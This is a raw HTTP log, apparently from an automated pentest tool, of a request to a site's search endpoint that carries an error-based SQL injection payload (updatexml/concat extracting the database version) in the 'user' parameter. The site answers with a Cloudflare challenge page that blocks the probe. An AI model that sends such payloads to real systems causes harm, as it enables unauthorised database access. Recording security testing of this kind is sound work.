REQUEST:
GET https://my.myfirst.tech/search?user=1%27%20AND%20updatexml%281%2Cconcat%280x7e%2C%28SELECT%20version%28%29%29%29%2C1%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9546
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84750fa00a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=3zsCMw7s0RMOVLmz6V7iXyrE619ar7qxJtl%2FCNHlSBPUB500L4e59cZxw31ljjFujGSKrUTROYch3opNJzgPclP%2FY3RIxzlLe4I1SXW4LcZeXekHojkMCMtDbvrcKMd%2FVt4boWIfbhA6W3veqg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84750fa00a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'RUyYI4HtCoYAHU7x1h3HNWMmb.No3A1o964dA3rQg00-1784281157-1.2.1.1-SLlgwVLui0AvwNl.cA4Vtvd7byKMpfiQ0JbQh2YzR6raqF6fqiX0LO42X98vutX7',cITimeS: '1784281157',cRay: 'a1c84750fa00a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?user=1%27+AND+updatexml%281%2Cconcat%280x7e%2C%28SELECT+version%28%29%29%29%2C1%29--\u0026__cf_chl_tk=RDufsP2pr2YUsHpbAVEKzWWrHWcjPtmOFq6neSK1W50-1784281157-1.0.1.1-JG_6.bFXX9gSztW0cIdyMHhJqN5AnIMr3I.r.jghI4A",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?user=1%27+AND+updatexml%281%2Cconcat%280x7e%2C%28SELECT+version%28%29%29%29%2C1%29--\u0026__cf_chl_f_tk=RDufsP2pr2YUsHpbAVEKzWWrHWcjPtmOFq6neSK1W50-1784281157-1.0.1.1-JG_6.bFXX9gSztW0cIdyMHhJqN5AnIMr3I.r.jghI4A",md: 'g94dCKXMHjj7CFbRdNTO0rP5BQNAxeqntQI5VUsUCAc-1784281157-1.2.1.1-8MAFW11dwNoBJPpJCRuZNGhIsqUqBbJ67R84ERjUgWef7qlh_aFdWCREx8Obi3Wizv2jVpWlpY3Z_SfK_gu25343be0f8fPsAk1pf029bv5e55yk.8UxwnHAyQcWd7hDJbz2A.p5t4TN6edweK810xlzufOFOAA6jAz3uPwTErGJwSVE1wt18l8sixJzlouXI6iOZazP11ALuYK3a_OejJ9iZJHLn_gCsRqj86XOzu.VtAg6rzjL652FD1lty9eCFYyL_v3M0MSksq2mwNJ0u9Lv1qv5vCUKB.G3OTDaB3IEVV9OPf4_Kh5oSfitSZSACyWbUP1TYL3GXRZhhq0yxvIBRy4n55rnARsCDNw2rIoSlNvNYyu2k6j3i6giF8HMsTrZ2PeGZgToJuX5Yg0XRooO4UO2qHBA9tWFdqU2QNo1LEyxNBnqYh5HzZFga.O4fw7AbTEC3Yi6rnp801UcsbiuUh1NkZzu9X5VVGGf94UE9rZ5N8nXOmvfy2Fq6MeGh02q8guAa_RP9pknEYPqng5EVfY1htG4cU2YPJbC6A268qw5ZXi7JwU5CtImr7VHYs1JiymAprERFywLBRJX0r.mN3zp1WlVs.wHb2b_Lsn6_OFXk4wSTzhtZI5yCKg1aDS4FSZvFaScS9kOX_2YZjfFA47fceHdS1y_WW6Fo6dgOgmOn7fTLYIvjdUm4JWF1P948DnzT36IkRkIXj3OOalmd5R5tjQ.g611mWdskERsoF8jlQ9HUFfkSgchtcslmExm95N9wJSk4OfEhzhZOVEf6mJNHujT0_OczrKsKFr_35Ht2tQIUcPSJG3kZVPSWv15Keul_mzUyziJGMFV3ZcY5oHSM80z4GcwOPnWZHZbWVLxaFW1RG7dl58ji1DCyT.mSh0l07NeaYV_HGb1UL8D8wYUEffAgHtvQFkdBa2ZT7wvBLaFWBGESZ0JDOPgs7Gc4tG8Wa3ihiA0OsYkCQIr6A8KunBt_Z9PWoqOg7AMtuArbxhod1ShFY3Qh_H2I0D9qNgErqmS3KytkO.5rV6X.Gus1onzfyMmwB_5vHmw0TZJk5mjeBgu1azRlH8NVYqKG4tRA.f9CXCI_Oy_oiLrjUJkd6v2JIr5jXJOvXpCq1A2sXwhWTBfGf_EN4LOhEcel5DqsD9ILnXpjy4jShrmZ1kdz7EEVrlALklX7kOIwgAwAoSseNjqzXOUkuZbxwguSuGJ0WvpV.ehchgUnngbZ5djjIt82erVOagBqRs',mdrd: 'MRQDbnvOvsjPw12A1I6c.2C4SsqKiuAyYYLT_rKdOic-1784281157-1.2.1.1-cL4s2CJBuDBQsTUhMRineFohf5uTA8n5s5CLaQ80Zw9RpiJASX2D.vdbC5yKmN71N0s4FF8wE89hKKnsxHewThFoZmHbqr95oOc.G5q3eSqUN_U8n4S.JrhEEuQgbSf1BNrgVvMMXLwPghXYBxioQedr6JQpRoqOrhtWc1RZJdrkr3xxItOqq3TGVaAzxbhb9cU7RzZ2Lh1sXbZP5rfVo.mk6xM4ArN6t6_CaqOelPHGhHTHC7jcXo2Xja98ZFT.',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84750fa00a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?user=1%27+AND+updatexml%281%2Cconcat%280x7e%2C%28SELECT+version%28%29%29%29%2C1%29--\u0026__cf_chl_rt_tk=RDufsP2pr2YUsHpbAVEKzWWrHWcjPtmOFq6neSK1W50-1784281157-1.0.1.1-JG_6.bFXX9gSztW0cIdyMHhJqN5AnIMr3I.r.jghI4A"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
